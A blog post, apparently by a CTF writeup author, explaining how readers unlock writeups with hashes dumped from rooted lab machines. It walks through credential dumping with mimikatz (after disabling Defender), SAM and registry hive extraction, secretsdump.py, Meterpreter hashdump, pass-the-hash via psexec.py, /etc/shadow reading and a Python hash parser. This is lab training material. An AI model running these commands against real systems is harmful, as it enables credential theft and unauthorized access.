
How to Access the Password-protected Writeups?

This post explains how you can access my password-protected writeups.

TOC

  1. Windows Machines
    1. Using Mimikatz
    2. Using System Registries
    3. Using Secretsdump.py
    4. Using Metasploit HashDump
  2. Linux Machines
  3. Challenges
  4. Fortress

Windows

If the machine you want to access is a Windows machine, you will need the NTLM hash of that machine's Administrator user (strictly the NT hash, the second half of the LM:NT pair that dumping tools print).

Suppose you have done machine XYZ. You have to root it first, and then you need the Administrator NTLM hash of XYZ. There are many ways to get it; I am going to discuss a few of them.

1. Mimikatz

This is the most reliable and easiest way to get the Administrator user's NTLM hash.

The first requirement for using mimikatz properly is an nt authority\system shell (strictly, an elevated Administrator shell is enough, because the token::elevate command used below impersonates a SYSTEM token; getting SYSTEM first just makes the step explicit). The second requirement is that Windows Defender does not catch it, so either turn off Real-time Protection or evade it.

If you have rooted the machine, you will have an Administrator shell, and you can use the PrintSpoofer utility to get a SYSTEM shell like this. PrintSpoofer needs SeImpersonatePrivilege in the current token and checks for it before doing anything, as the first line of its output shows.

PrintSpoofer - https://github.com/itm4n/PrintSpoofer

Remember to turn off Defender first.

C:\Users\0xPrashant\Desktop>whoami
0xprashant-pc\0xprashant

C:\Users\0xPrashant\Desktop>.\PrintSpoofer32.exe -i -c "powershell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32>

The next step is to get the NTLM hash of the user Administrator.

Run mimikatz.exe with the three commands below: privilege::debug enables SeDebugPrivilege, token::elevate impersonates a SYSTEM token, and lsadump::sam decrypts the local SAM using the boot key from the SYSTEM hive:

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

Somewhere in the output you will see the NTLM hash of user Administrator:

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 5fbc3d5fec8206a30f4b6c474d68ad71

The NTLM hash for user Administrator is 5fbc3d5fec8206a30f4b6c474d68ad71; use this as the password to access the writeup.

2. Using System Registries

In this method you do not need to turn off Real-time Protection; you just need a SYSTEM shell (an elevated Administrator shell also works, since reg save relies on SeBackupPrivilege, which Administrators hold).

First save the SAM, SECURITY and SYSTEM hives to the current directory:

PS C:\Users\0xPrashant\Desktop> reg.exe save hklm\sam sam.save
The operation completed successfully.
PS C:\Users\0xPrashant\Desktop> reg.exe save hklm\security security.save
The operation completed successfully.
PS C:\Users\0xPrashant\Desktop> reg.exe save hklm\system system.save
The operation completed successfully.
PS C:\Users\0xPrashant\Desktop>

Now move the files sam.save, system.save and security.save to your Linux attacking box.

I will be using secretsdump.py from impacket to extract the hashes from these files. The SYSTEM hive is required because it holds the boot key that decrypts the SAM; SECURITY is optional for the local hashes but also yields LSA secrets and cached domain credentials:

root at 0xprashant-parrot in /home/prashant/Desktop 
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x8605b55c1e232d273205bfa830118e1f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c474d68ad71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:**********************************:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:**********************************:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:**********************************:::
0xPrashant:1001:aad3b435b51404eeaad3b435b51404ee:**********************************:::

The NTLM hash for user Administrator is 5fbc3d5fec8206a30f4b6c474d68ad71; use this as the password to access the writeup.

3. Using Secretsdump.py

In this method you need neither to turn off Real-time Protection nor a SYSTEM shell; you just need the password of the user Administrator (an already-known hash also works, via -hashes) and SMB reachable on the target.

You just need secretsdump.py from impacket and the Administrator password. As the output shows, secretsdump.py enables and starts the RemoteRegistry service on the target if it is disabled, because it reads the hives through the remote registry:

root at 0xprashant-parrot in /home/prashant/Desktop 
$ secretsdump.py Administrator:'password_here'@machine_ip                         
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x8605b55c1e232d273205bfa830118e1f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c474d68ad71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:**********************************:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:**********************************:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:**********************************:::
0xPrashant:1001:aad3b435b51404eeaad3b435b51404ee:**********************************:::

The NTLM hash for user Administrator is 5fbc3d5fec8206a30f4b6c474d68ad71; use this as the password to access the writeup.

4. Using Metasploit HashDump

In this method you will need a meterpreter session running as nt authority\system, and then use the hashdump post module to get the hashes, including the Administrator user's:

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.43.36:4444 
[*] Sending stage (176195 bytes) to 192.168.43.170
[*] Meterpreter session 2 opened (192.168.43.36:4444 -> 192.168.43.170:1030) at 2021-07-27 19:35:50 +0530

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Now background the session

meterpreter > bg
[*] Backgrounding session 2...
msf5 exploit(multi/handler) > 

Now I will use the post module post/windows/gather/hashdump to get the NTLM hash:

msf5 exploit(multi/handler) > use post/windows/gather/hashdump
msf5 post(windows/gather/hashdump) >

Set the SESSION option to the session you backgrounded earlier:

msf5 post(windows/gather/hashdump) > set session 2
session => 2
msf5 post(windows/gather/hashdump) >

And now run the module:

msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8605b55c1e232d273205bfa830118e1f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c474d68ad71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:**********************************:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:**********************************:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:**********************************:::
0xPrashant:1001:aad3b435b51404eeaad3b435b51404ee:**********************************:::


[*] Post module execution completed
msf5 post(windows/gather/hashdump) >

The NTLM hash for user Administrator is 5fbc3d5fec8206a30f4b6c474d68ad71; use this as the password to access the writeup.

To confirm whether your NTLM hash is right, use psexec.py to spawn a shell with it (pass-the-hash), provided SMB (port 445) is open on the machine. The -hashes argument takes LMHASH:NTHASH; the LM half can be left empty, as below:

root at 0xprashant-parrot in /home/prashant 
$ psexec.py Administrator@machine_ip -hashes :5fbc3d5fec8206a30f4b6c474d68ad71
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 192.168.43.170.....
[*] Found writable share ADMIN$
[*] Uploading file Kfrvcops.exe
[*] Opening SVCManager on 192.168.43.170.....
[*] Creating service uHZo on 192.168.43.170.....
[*] Starting service uHZo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.1149]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

C:\WINDOWS\system32>

If the hash is right you will be given a shell (SYSTEM, since psexec.py runs its service binary as SYSTEM); if it is wrong, the SMB login fails with STATUS_LOGON_FAILURE and no shell is spawned.

Linux

When you pwn a Linux machine and get a shell as root, you can read /etc/shadow, which contains the hashed passwords of all the users on the machine (it is readable only by root, or by the shadow group on distributions that use one).

Read the file /etc/shadow:

root at 0xprashant-parrot in /home/prashant 
$ cat /etc/shadow                   
root:$6$ENX1BUwpwsmOg8RW$9iTErc6NUQo/09eJqj7Cy2sT7lQnL5boM4psc/c1ato/GVwuIJhJbibxToNgXRKsRHOhRyEeHsEOSSeMg8w4a2:18526:0:99999:7:::

The hash is the second field of the line: everything from the first colon to the next colon. The $6$ prefix says it is sha512crypt, ENX1BUwpwsmOg8RW is the salt, and the part after the third $ is the digest:

$6$ENX1BUwpwsmOg8RW$9iTErc6NUQo/09eJqj7Cy2sT7lQnL5boM4psc/c1ato/GVwuIJhJbibxToNgXRKsRHOhRyEeHsEOSSeMg8w4a2

This whole string, including the $6$ prefix and the salt, is what you use as the password to access the writeup.

EZPZ :)
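As an added example (not code from the original post), here is a small parser for /etc/shadow records that extracts exactly that second field and says what it is. It also handles cases you meet on real machines but not in the root line above: accounts locked with ! or * (passwd -l merely prefixes the real hash with !, so the crackable string is still there), accounts with no password at all, and other crypt(3) schemes such as yescrypt, which newer distributions default to. The root record is the one shown above; every other record in SAMPLE_SHADOW is constructed for this example.

```python
# Added example, not code from the original post: parse /etc/shadow records,
# return the verbatim second field the writeup password expects, and classify
# it. The root record is the one from the post; the rest are constructed.
from dataclasses import dataclass
from datetime import date, timedelta
from typing import Optional

EPOCH = date(1970, 1, 1)
# crypt(3) scheme identifier: the text between the first two '$' of the hash
CRYPT_SCHEMES = {
    "1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
    "5": "sha256crypt", "6": "sha512crypt", "7": "scrypt", "y": "yescrypt",
}


@dataclass
class ShadowEntry:
    user: str
    hash: str  # field 2 verbatim, e.g. $6$<salt>$<digest>; this is the writeup password
    last_change: Optional[date]
    min_days: Optional[int]
    max_days: Optional[int]
    warn_days: Optional[int]
    inactive_days: Optional[int]
    expire: Optional[date]

    @property
    def state(self) -> str:
        """empty: no password; locked: '!'/'*' prefix (password login impossible);
        hashed: a $id$ crypt string; legacy: old 13-character DES crypt."""
        if self.hash == "":
            return "empty"
        if self.hash[0] in "!*":
            return "locked"
        return "hashed" if self.hash.startswith("$") else "legacy"

    @property
    def unlocked_hash(self) -> Optional[str]:
        """'passwd -l' only prepends '!' to the real hash, so the crackable string
        survives: return it, or None if nothing usable sits behind the lock."""
        inner = self.hash.lstrip("!")
        return inner if self.state == "locked" and inner.startswith("$") else None

    def _crypt_string(self) -> Optional[str]:
        return self.hash if self.state == "hashed" else self.unlocked_hash

    @property
    def scheme(self) -> Optional[str]:
        h = self._crypt_string()
        if h is None:
            return None
        ident = h.split("$")[1]
        return CRYPT_SCHEMES.get(ident, "unknown($" + ident + "$)")

    @property
    def salt(self) -> Optional[str]:
        """Salt for the $id[$params]$salt$digest layouts; bcrypt packs cost, salt
        and digest into one run of characters, so it is reported as None."""
        h = self._crypt_string()
        if h is None or self.scheme == "bcrypt":
            return None
        return h.split("$")[-2]


def parse_shadow_line(line: str) -> ShadowEntry:
    fields = line.rstrip("\n").split(":")
    if len(fields) != 9:
        raise ValueError("expected 9 colon-separated fields, got %d" % len(fields))
    user, pw, lastchg, mn, mx, warn, inact, expire, _reserved = fields
    days = lambda s: EPOCH + timedelta(days=int(s)) if s else None  # stored as days since epoch
    num = lambda s: int(s) if s else None
    return ShadowEntry(user, pw, days(lastchg), num(mn), num(mx), num(warn), num(inact), days(expire))


def parse_shadow(text: str) -> dict:
    """user -> ShadowEntry for every non-empty line."""
    return {e.user: e for e in (parse_shadow_line(l) for l in text.splitlines() if l.strip())}


def writeup_password(shadow_text: str, user: str = "root") -> str:
    """The string to paste into the writeup's password box: field 2, verbatim."""
    entry = parse_shadow(shadow_text)[user]
    if entry.state != "hashed":
        raise ValueError("%s has no usable hash (state=%s)" % (user, entry.state))
    return entry.hash


# root is the record from the post; the other lines are constructed (fake digests).
SAMPLE_SHADOW = """\
root:$6$ENX1BUwpwsmOg8RW$9iTErc6NUQo/09eJqj7Cy2sT7lQnL5boM4psc/c1ato/GVwuIJhJbibxToNgXRKsRHOhRyEeHsEOSSeMg8w4a2:18526:0:99999:7:::
daemon:*:18474:0:99999:7:::
sync:!:18474:0:99999:7:::
lab:!$6$abcdefgh$constructedDigestNotReal:18526:0:99999:7:::
nopass::18526:0:99999:7:::
bob:$y$j9T$constructedSalt$constructedDigest:18600:0:99999:7:::
"""

if __name__ == "__main__":
    for e in parse_shadow(SAMPLE_SHADOW).values():
        print(e.user, e.state, e.scheme, e.salt, e.last_change)
    print(writeup_password(SAMPLE_SHADOW))
```

The third field is a day count since 1970-01-01, not a timestamp, which is why the parser converts it with timedelta; the root line's 18526 is 2020-09-21, a quick sanity check that you copied the right line.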

Challenges

To access the writeup of an active challenge, just submit the flag you got after completing the challenge.

For example HTB{F1nal_Fl4g}: use that flag as the password to access the writeup.

Fortress

To access a Fortress writeup, use the last flag of the fortress.

For example, if the fortress has 10 flags and you got the 10th flag, use that flag as the password to access the writeup.

This post is licensed under CC BY 4.0 by the author.